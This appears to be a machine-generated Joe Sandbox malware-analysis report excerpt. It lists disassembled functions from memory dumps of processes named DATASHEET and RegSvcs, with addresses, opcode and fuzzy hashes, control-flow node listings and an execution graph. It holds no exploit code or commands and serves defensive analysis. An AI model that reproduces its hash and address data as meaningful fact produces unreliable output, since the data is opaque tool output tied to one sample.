                                                                                                          • Opcode ID: 925d1a98d7f6f12aa257b9c1da72de3276da837a059fcbad23aa2e14cb523b86
                                                                                                          • Instruction ID: 3f697da5f892a4d06e000d8926302160071cb9bd0712f06ec524119d3c4c7a62
                                                                                                          • Opcode Fuzzy Hash: 925d1a98d7f6f12aa257b9c1da72de3276da837a059fcbad23aa2e14cb523b86
                                                                                                          • Instruction Fuzzy Hash: 3C21F275604200DFCB14DF14D984B26BBB5EF84324F64C56ED80E4B29AC33AD847DA62
                                                                                                          Function 00F7D005 Relevance: .1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1777278033.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_f7d000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cbe7accfc92fead2c2f56afe6b4b8cfcee0aa9644e8d1ae2608d17e1fca25d5a
                                                                                                          • Instruction ID: 161440c7dbc6ca4b015b47a9ab090ce4feb6728793bb0217cc39854d57c630f9
                                                                                                          • Opcode Fuzzy Hash: cbe7accfc92fead2c2f56afe6b4b8cfcee0aa9644e8d1ae2608d17e1fca25d5a
                                                                                                          • Instruction Fuzzy Hash: 21214F755093808FDB12CF24D994715BF71EF46214F28C5EBD8498B6A7C33A980ADB62
                                                                                                          Function 00F7D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1777278033.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_f7d000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: 3f7cc032fe7f5cfd72fc989b2aff86de77dbc6f701e9fda372ae8545ac0ea0b0
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: C311A975904280DFCB06CF10C9C4B15BBB1FB84324F28C6AAD8494B296C33AD81ADB62
                                                                                                          Function 00F6D759 Relevance: .0, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1777214184.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_f6d000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a64d6ddbc7de943f42328de45b525fdbb918f9d2156ccc457823edfeaa56f314
                                                                                                          • Instruction ID: 109d500f4a9216a8a6c5b3804ae6e4e86d5aea4f584b39b6c2efd2afdc8f41ba
                                                                                                          • Opcode Fuzzy Hash: a64d6ddbc7de943f42328de45b525fdbb918f9d2156ccc457823edfeaa56f314
                                                                                                          • Instruction Fuzzy Hash: FF01DB71A093449EE7104A26DD84767FFE8EF51734F1CC56AED094E286C379D840D6B2
                                                                                                          Function 00F6D758 Relevance: .0, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1777214184.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_f6d000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 216c18529319737359d57203f35c8b4aadad4eb147859d185d05306f2c2f4ecf
                                                                                                          • Instruction ID: fbe64b14f573213d0238d3ad22cad32e59ceb0519f64b0c45217e2d1b707a8ec
                                                                                                          • Opcode Fuzzy Hash: 216c18529319737359d57203f35c8b4aadad4eb147859d185d05306f2c2f4ecf
                                                                                                          • Instruction Fuzzy Hash: 3EF062719093449EE7108E16DC84B66FFA8EF51734F18C45AED084E286C3799844DAB1

                                                                                                          Non-executed Functions

                                                                                                          Function 07DB35D0 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q$PH^q
                                                                                                          • API String ID: 0-1598597984
                                                                                                          • Opcode ID: cccd44e17172ad83980f1ea25889636d9542c63fce2061c76d9121c6fbc9e58b
                                                                                                          • Instruction ID: e839203b2a9a24395d0d434c74744078dd6d7784872679a5f1d25924101c52ec
                                                                                                          • Opcode Fuzzy Hash: cccd44e17172ad83980f1ea25889636d9542c63fce2061c76d9121c6fbc9e58b
                                                                                                          • Instruction Fuzzy Hash: 82D1C0B4A00209CFDB18CF69C598AE9B7F1EF4D711F2580A9E406AB371DB31AD44DB60
                                                                                                          Function 05ECA620 Relevance: .3, Instructions: 312COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 448b5e61d3ffa4469f323a4e906408811d1f93a34a58e661ca4995d544816f7a
                                                                                                          • Instruction ID: 9f382b4a7a3865e57e16806f112cedb2ea9a894defc382518ba8a262392ddfb5
                                                                                                          • Opcode Fuzzy Hash: 448b5e61d3ffa4469f323a4e906408811d1f93a34a58e661ca4995d544816f7a
                                                                                                          • Instruction Fuzzy Hash: 95E13D74E001198FDB14DFA9C5809AEFBB2FF89304F2491A9E455AB356DB30AD42CF60
                                                                                                          Function 05ECA1E8 Relevance: .3, Instructions: 312COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 964506bc3edfc77d40aeea7f8d1cabd67be3b63432d087e4ed90538253197674
                                                                                                          • Instruction ID: b1341b993a90dc2308f51e8f6218c04d547db518ce27b16e5e2f2a20156313c9
                                                                                                          • Opcode Fuzzy Hash: 964506bc3edfc77d40aeea7f8d1cabd67be3b63432d087e4ed90538253197674
                                                                                                          • Instruction Fuzzy Hash: 85E12C74E001199FCB14DFA9C5809AEFBB2FF49305F249169E455AB355DB30AD82CF60
                                                                                                          Function 05ECC2D0 Relevance: .3, Instructions: 312COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8840dcb60a5a70576443b54165054b595bf674edbec40ec5877d036dca2c8aa8
                                                                                                          • Instruction ID: 3637381f7b0d042bb18941f1a7d52dba05ffb581272e71af29df5c4b90e29384
                                                                                                          • Opcode Fuzzy Hash: 8840dcb60a5a70576443b54165054b595bf674edbec40ec5877d036dca2c8aa8
                                                                                                          • Instruction Fuzzy Hash: B9E12D74E001198FDB14DFA9C6809AEFBB2FF89305F249199E459AB355DB30AD42CF60
                                                                                                          Function 05ECBDC0 Relevance: .3, Instructions: 312COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d0636e5bc054d69ff1bf6bfa7f6b7770099c141e9e224c8e2c8c7b4a984de9d8
                                                                                                          • Instruction ID: 508b306cdbf646d2241d25a10b517b0b537b17bf56017c3ec3c20a33c2386763
                                                                                                          • Opcode Fuzzy Hash: d0636e5bc054d69ff1bf6bfa7f6b7770099c141e9e224c8e2c8c7b4a984de9d8
                                                                                                          • Instruction Fuzzy Hash: DDE11C74E002198FDB14DFA9C5809AEFBB2FF49305F249169E459AB356DB30AD42CF60
                                                                                                          Function 05EC9DB0 Relevance: .3, Instructions: 312COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e0a6792ad7014130166b6123d32bd8fd07910ac54f6ed9916316edc625c6909a
                                                                                                          • Instruction ID: 35a56b9dba6058cfca904c801619f64683822a5966a02e5f4df88767eb9cb052
                                                                                                          • Opcode Fuzzy Hash: e0a6792ad7014130166b6123d32bd8fd07910ac54f6ed9916316edc625c6909a
                                                                                                          • Instruction Fuzzy Hash: D2E12974E002198FCB14DFA9C5809AEFBB2FF89345F249169E455AB356DB30AD42CF60
                                                                                                          Function 05EC16C1 Relevance: .3, Instructions: 299COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 600d023d58a2297dae3a0f5d422701d3a987921a89d7f59c9a01c8c7c97f4258
                                                                                                          • Instruction ID: 6c33a32556b041b1bbccce7e015fbf83b9f6907cf17da440c2fda014944038cf
                                                                                                          • Opcode Fuzzy Hash: 600d023d58a2297dae3a0f5d422701d3a987921a89d7f59c9a01c8c7c97f4258
                                                                                                          • Instruction Fuzzy Hash: 91E11631910B5A8ECB10EB64D990BD9B7B1FF95304F50C79AE00977225EB706EC9CB82
                                                                                                          Function 05EC16F8 Relevance: .3, Instructions: 264COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69a1b25772c15457e81ef0b2c1e16a5b4393aef801c6e0d3db0e02272b031bf4
                                                                                                          • Instruction ID: 2d57b2857acf098874d5f62e0eec233a340e7f394abd5badd74a42b13686ff0f
                                                                                                          • Opcode Fuzzy Hash: 69a1b25772c15457e81ef0b2c1e16a5b4393aef801c6e0d3db0e02272b031bf4
                                                                                                          • Instruction Fuzzy Hash: 0ED1E435920A5A9ACB00EB64D991BDDB771FF95300F50C79AE00977225EB706EC9CB81
                                                                                                          Function 02B2DF64 Relevance: .3, Instructions: 264COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7e0585a030aef7364facd2f934a7d4380be871a370f73e3d22bc21f41f9ad6f6
                                                                                                          • Instruction ID: aa1685a4a293c7a01fd2ca8045e8f0d86134460b5668fbd7abdf0e8c6f353d7b
                                                                                                          • Opcode Fuzzy Hash: 7e0585a030aef7364facd2f934a7d4380be871a370f73e3d22bc21f41f9ad6f6
                                                                                                          • Instruction Fuzzy Hash: 7CA14E32A003168FCF15DFB5C4845AEB7B3FF84304B1545AAE809AB265DB75E95ACF80
                                                                                                          Function 05ECA610 Relevance: .1, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 29fd87ee68030ee52059f93040f1f5f5653c2683386e432512402dc152e6a5e3
                                                                                                          • Instruction ID: 1577e9f56be46ca0ec7bcb13c5034756dfd3cf782065156d8444739315dc698c
                                                                                                          • Opcode Fuzzy Hash: 29fd87ee68030ee52059f93040f1f5f5653c2683386e432512402dc152e6a5e3
                                                                                                          • Instruction Fuzzy Hash: 3E514A71E042198FDB14CFA9C6805AEFBB2BF89304F2491A9D458AB356DB309D42CF61

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:11.5%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:17
                                                                                                          Total number of Limit Nodes:4
                                                                                                          execution_graph 23805 1530848 23807 153084e 23805->23807 23806 153091b 23807->23806 23809 1531390 23807->23809 23811 1531393 23809->23811 23810 15314a0 23810->23807 23811->23810 23813 1537f98 23811->23813 23814 1537fa2 23813->23814 23815 1537fbc 23814->23815 23818 6a9faa0 23814->23818 23822 6a9fab0 23814->23822 23815->23811 23820 6a9faaf 23818->23820 23819 6a9fcda 23819->23815 23820->23819 23821 6a9fcf1 GlobalMemoryStatusEx 23820->23821 23821->23820 23824 6a9fac5 23822->23824 23823 6a9fcda 23823->23815 23824->23823 23825 6a9fcf1 GlobalMemoryStatusEx 23824->23825 23825->23824

                                                                                                          Executed Functions

                                                                                                          Function 06A930D0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 134 6a930d0-6a930f1 135 6a930f3-6a930f6 134->135 136 6a930fc-6a9311b 135->136 137 6a93897-6a9389a 135->137 146 6a9311d-6a93120 136->146 147 6a93134-6a9313e 136->147 138 6a9389c-6a938bb 137->138 139 6a938c0-6a938c2 137->139 138->139 141 6a938c9-6a938cc 139->141 142 6a938c4 139->142 141->135 144 6a938d2-6a938db 141->144 142->141 146->147 149 6a93122-6a93132 146->149 152 6a93144-6a93153 147->152 149->152 260 6a93155 call 6a938e8 152->260 261 6a93155 call 6a938f0 152->261 153 6a9315a-6a9315f 154 6a9316c-6a93449 153->154 155 6a93161-6a93167 153->155 176 6a93889-6a93896 154->176 177 6a9344f-6a934fe 154->177 155->144 186 6a93500-6a93525 177->186 187 6a93527 177->187 188 6a93530-6a93543 186->188 187->188 191 6a93549-6a9356b 188->191 192 6a93870-6a9387c 188->192 191->192 195 6a93571-6a9357b 191->195 192->177 193 6a93882 192->193 193->176 195->192 196 6a93581-6a9358c 195->196 196->192 197 6a93592-6a93668 196->197 209 6a9366a-6a9366c 197->209 210 6a93676-6a936a6 197->210 209->210 214 6a936a8-6a936aa 210->214 215 6a936b4-6a936c0 210->215 214->215 216 6a93720-6a93724 215->216 217 6a936c2-6a936c6 215->217 218 6a9372a-6a93766 216->218 219 6a93861-6a9386a 216->219 217->216 220 6a936c8-6a936f2 217->220 230 6a93768-6a9376a 218->230 231 6a93774-6a93782 218->231 219->192 219->197 227 6a93700-6a9371d 220->227 228 6a936f4-6a936f6 220->228 227->216 228->227 230->231 234 6a93799-6a937a4 231->234 235 6a93784-6a9378f 231->235 238 6a937bc-6a937cd 234->238 239 6a937a6-6a937ac 234->239 235->234 240 6a93791 235->240 244 6a937cf-6a937d5 238->244 245 6a937e5-6a937f1 238->245 241 6a937ae 239->241 242 6a937b0-6a937b2 239->242 240->234 241->238 242->238 246 6a937d9-6a937db 244->246 247 6a937d7 244->247 249 6a93809-6a9385a 245->249 250 6a937f3-6a937f9 245->250 246->245 247->245 249->219 251 6a937fb 250->251 252 6a937fd-6a937ff 250->252 251->249 252->249 260->153 261->153
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2392861976
                                                                                                          • Opcode ID: 677e5ee80da7d7c787073b69e3f50a50282d1b33cf7a0b5bef78c26ed6549177
                                                                                                          • Instruction ID: 11a7710732ce7ac0c39044efb5cee185f2e703dbfa2d0dab5309fdc4ccb2d03b
                                                                                                          • Opcode Fuzzy Hash: 677e5ee80da7d7c787073b69e3f50a50282d1b33cf7a0b5bef78c26ed6549177
                                                                                                          • Instruction Fuzzy Hash: 87321F31E1061ACFCF14EF75C89459DB7B6BFD9300F20C6A9D409AB264EB70A985CB91
                                                                                                          Function 06A97E00 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 904 6a97e00-6a97e1e 905 6a97e20-6a97e23 904->905 906 6a97e30-6a97e33 905->906 907 6a97e25-6a97e2f 905->907 908 6a97e35-6a97e4f 906->908 909 6a97e54-6a97e57 906->909 908->909 910 6a97e59-6a97e67 909->910 911 6a97e6e-6a97e71 909->911 918 6a97ea6-6a97ebc 910->918 920 6a97e69 910->920 913 6a97e73-6a97e8f 911->913 914 6a97e94-6a97e96 911->914 913->914 915 6a97e98 914->915 916 6a97e9d-6a97ea0 914->916 915->916 916->905 916->918 924 6a97ec2-6a97ecb 918->924 925 6a980d7-6a980e1 918->925 920->911 926 6a97ed1-6a97eee 924->926 927 6a980e2-6a98117 924->927 936 6a980c4-6a980d1 926->936 937 6a97ef4-6a97f1c 926->937 930 6a98119-6a9811c 927->930 931 6a9813f-6a98142 930->931 932 6a9811e-6a9813a 930->932 934 6a98148-6a98154 931->934 935 6a981ef-6a981f2 931->935 932->931 944 6a9815f-6a98161 934->944 939 6a981f8-6a98207 935->939 940 6a98427-6a98429 935->940 936->924 936->925 937->936 958 6a97f22-6a97f2b 937->958 950 6a98209-6a98224 939->950 951 6a98226-6a9826a 939->951 942 6a9842b 940->942 943 6a98430-6a98433 940->943 942->943 943->930 946 6a98439-6a98442 943->946 948 6a98179-6a9817d 944->948 949 6a98163-6a98169 944->949 955 6a9818b 948->955 956 6a9817f-6a98189 948->956 953 6a9816b 949->953 954 6a9816d-6a9816f 949->954 950->951 964 6a983fb-6a98411 951->964 965 6a98270-6a98281 951->965 953->948 954->948 957 6a98190-6a98192 955->957 956->957 959 6a981a9-6a981e2 957->959 960 6a98194-6a98197 957->960 958->927 962 6a97f31-6a97f4d 958->962 959->939 985 6a981e4-6a981ee 959->985 960->946 970 6a97f53-6a97f7d 962->970 971 6a980b2-6a980be 962->971 964->940 974 6a98287-6a982a4 965->974 975 6a983e6-6a983f5 965->975 987 6a980a8-6a980ad 970->987 988 6a97f83-6a97fab 970->988 971->936 971->958 974->975 984 6a982aa-6a983a0 call 6a96620 974->984 975->964 975->965 1037 6a983ae 984->1037 1038 6a983a2-6a983ac 984->1038 987->971 988->987 994 6a97fb1-6a97fdf 988->994 994->987 1000 6a97fe5-6a97fee 994->1000 1000->987 1001 6a97ff4-6a98026 1000->1001 1009 6a98028-6a9802c 1001->1009 1010 6a98031-6a9804d 1001->1010 1009->987 1011 6a9802e 1009->1011 1010->971 1012 6a9804f-6a980a6 call 6a96620 1010->1012 1011->1010 1012->971 1039 6a983b3-6a983b5 1037->1039 1038->1039 1039->975 1040 6a983b7-6a983bc 1039->1040 1041 6a983ca 1040->1041 1042 6a983be-6a983c8 1040->1042 1043 6a983cf-6a983d1 1041->1043 1042->1043 1043->975 1044 6a983d3-6a983df 1043->1044 1044->975
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: 184eb70c51eaa8c0ec58cbdbd394fb70480e000db4389963bf26693a3dabe153
                                                                                                          • Instruction ID: 72cffe8888357c9777def65c1482d233a3277d2884da98a4d0e2b91404c3f3d0
                                                                                                          • Opcode Fuzzy Hash: 184eb70c51eaa8c0ec58cbdbd394fb70480e000db4389963bf26693a3dabe153
                                                                                                          • Instruction Fuzzy Hash: 6A028D30B002098FDF54EF65D594AAEB7E2FF85304F248929D4099B394DB35EC46CBA1
                                                                                                          Function 06A95618 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1986 6a95618-6a95635 1987 6a95637-6a9563a 1986->1987 1988 6a9563c-6a9564c 1987->1988 1989 6a95651-6a95654 1987->1989 1988->1989 1990 6a9566b-6a95671 1989->1990 1991 6a95656-6a95659 1989->1991 1995 6a95677 1990->1995 1996 6a95796-6a9579c 1990->1996 1993 6a9565b-6a95661 1991->1993 1994 6a95666-6a95669 1991->1994 1993->1994 1994->1990 1999 6a9567c-6a9567f 1994->1999 1995->1999 1997 6a9579e-6a957a9 1996->1997 1998 6a957f4-6a95823 1996->1998 1997->1998 2000 6a957ab-6a957b8 1997->2000 2013 6a9582d-6a95830 1998->2013 2001 6a95681-6a956a0 1999->2001 2002 6a956a5-6a956a8 1999->2002 2000->1998 2006 6a957ba-6a957be 2000->2006 2001->2002 2004 6a956aa-6a956ad 2002->2004 2005 6a956d6-6a956dc 2002->2005 2008 6a956af-6a956c1 2004->2008 2009 6a956c6-6a956c9 2004->2009 2010 6a956e2 2005->2010 2011 6a95774-6a95782 2005->2011 2012 6a957c3-6a957c6 2006->2012 2008->2009 2014 6a956cb-6a956cc 2009->2014 2015 6a956d1-6a956d4 2009->2015 2016 6a956e7-6a956ea 2010->2016 2022 6a95789-6a9578c 2011->2022 2017 6a957c8-6a957cf 2012->2017 2018 6a957d4-6a957d6 2012->2018 2023 6a95852-6a95855 2013->2023 2024 6a95832-6a95836 2013->2024 2014->2015 2015->2005 2015->2016 2026 6a956ec-6a956fd 2016->2026 2027 6a95702-6a95705 2016->2027 2017->2018 2019 6a957d8 2018->2019 2020 6a957dd-6a957e0 2018->2020 2019->2020 2020->1987 2028 6a957e6-6a957f3 2020->2028 2031 6a95791-6a95794 2022->2031 2034 6a95877-6a9587a 2023->2034 2035 6a95857-6a9585b 2023->2035 2032 6a9583c-6a95844 2024->2032 2033 6a95922-6a9595c 2024->2033 2026->2027 2029 6a95707-6a9570b 2027->2029 2030 6a95716-6a95719 2027->2030 2029->2028 2039 6a95711 2029->2039 2040 6a9571b-6a95724 2030->2040 2041 6a95725-6a95728 2030->2041 2031->1996 2031->2012 2032->2033 2042 6a9584a-6a9584d 2032->2042 2054 6a9595e-6a95961 2033->2054 2036 6a9589c-6a9589f 2034->2036 2037 6a9587c-6a95880 2034->2037 2035->2033 2043 6a95861-6a95869 2035->2043 2045 6a958a9-6a958ac 2036->2045 2046 6a958a1-6a958a8 2036->2046 2037->2033 2044 6a95886-6a9588e 2037->2044 2039->2030 2047 6a9572a-6a9572d 2041->2047 2048 6a95732-6a95735 2041->2048 2042->2023 2043->2033 2050 6a9586f-6a95872 2043->2050 2044->2033 2051 6a95894-6a95897 2044->2051 2052 6a958bc-6a958bf 2045->2052 2053 6a958ae-6a958b5 2045->2053 2047->2048 2055 6a9573c-6a9573f 2048->2055 2056 6a95737-6a95739 2048->2056 2050->2034 2051->2036 2059 6a958d9-6a958dc 2052->2059 2060 6a958c1-6a958c5 2052->2060 2057 6a9591a-6a95921 2053->2057 2058 6a958b7 2053->2058 2061 6a9596f-6a95972 2054->2061 2062 6a95963-6a9596a 2054->2062 2063 6a9574f-6a95752 2055->2063 2064 6a95741-6a95748 2055->2064 2056->2055 2058->2052 2068 6a958ed-6a958f0 2059->2068 2069 6a958de-6a958e8 2059->2069 2060->2033 2067 6a958c7-6a958cf 2060->2067 2070 6a95980-6a95983 2061->2070 2071 6a95974-6a9597b 2061->2071 2062->2061 2065 6a9576f-6a95772 2063->2065 2066 6a95754-6a9576a 2063->2066 2064->2047 2072 6a9574a 2064->2072 2065->2011 2065->2031 2066->2065 2067->2033 2077 6a958d1-6a958d4 2067->2077 2075 6a95908-6a9590a 2068->2075 2076 6a958f2-6a95903 2068->2076 2069->2068 2073 6a9598e-6a95b22 2070->2073 2074 6a95985-6a95988 2070->2074 2071->2070 2072->2063 2135 6a95b28-6a95b2f 2073->2135 2136 6a95c5b-6a95c6e 2073->2136 2074->2073 2078 6a95c71-6a95c74 2074->2078 2080 6a9590c 2075->2080 2081 6a95911-6a95914 2075->2081 2076->2075 2077->2059 2078->2073 2085 6a95c7a-6a95c7d 2078->2085 2080->2081 2081->2013 2081->2057 2086 6a95c7f-6a95c84 2085->2086 2087 6a95c87-6a95c8a 2085->2087 2086->2087 2088 6a95c8c-6a95c9d 2087->2088 2089 6a95ca4-6a95ca7 2087->2089 2096 6a95cc6-6a95cd7 2088->2096 2099 6a95c9f 2088->2099 2091 6a95ca9-6a95cba 2089->2091 2092 6a95cc1-6a95cc4 2089->2092 2103 6a95d29-6a95d3c 2091->2103 2104 6a95cbc 2091->2104 2095 6a95ce2-6a95ce5 2092->2095 2092->2096 2097 6a95d03-6a95d06 2095->2097 2098 6a95ce7-6a95cf8 2095->2098 2096->2071 2109 6a95cdd 2096->2109 2101 6a95d08-6a95d19 2097->2101 2102 6a95d24-6a95d27 2097->2102 2098->2071 2110 6a95cfe 2098->2110 2099->2089 2101->2071 2117 6a95d1f 2101->2117 2102->2103 2108 6a95d3f-6a95d41 2102->2108 2104->2092 2114 6a95d48-6a95d4b 2108->2114 2115 6a95d43 2108->2115 2109->2095 2110->2097 2114->2054 2116 6a95d51-6a95d5a 2114->2116 2115->2114 2117->2102 2137 6a95be3-6a95bea 2135->2137 2138 6a95b35-6a95b68 2135->2138 2137->2136 2139 6a95bec-6a95c1f 2137->2139 2149 6a95b6a 2138->2149 2150 6a95b6d-6a95bae 2138->2150 2151 6a95c21 2139->2151 2152 6a95c24-6a95c51 2139->2152 2149->2150 2160 6a95bb0-6a95bc1 2150->2160 2161 6a95bc6-6a95bcd 2150->2161 2151->2152 2152->2116 2160->2116 2163 6a95bd5-6a95bd7 2161->2163 2163->2116
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $
                                                                                                          • API String ID: 0-3993045852
                                                                                                          • Opcode ID: cb5cda287467abc568434fa64e698aec2ba80d3018d8669c3fcfa29e3e11638d
                                                                                                          • Instruction ID: 9443e92cef10dd184366531a0b33562fa58585410f2de65f3ed50a6358c92dd5
                                                                                                          • Opcode Fuzzy Hash: cb5cda287467abc568434fa64e698aec2ba80d3018d8669c3fcfa29e3e11638d
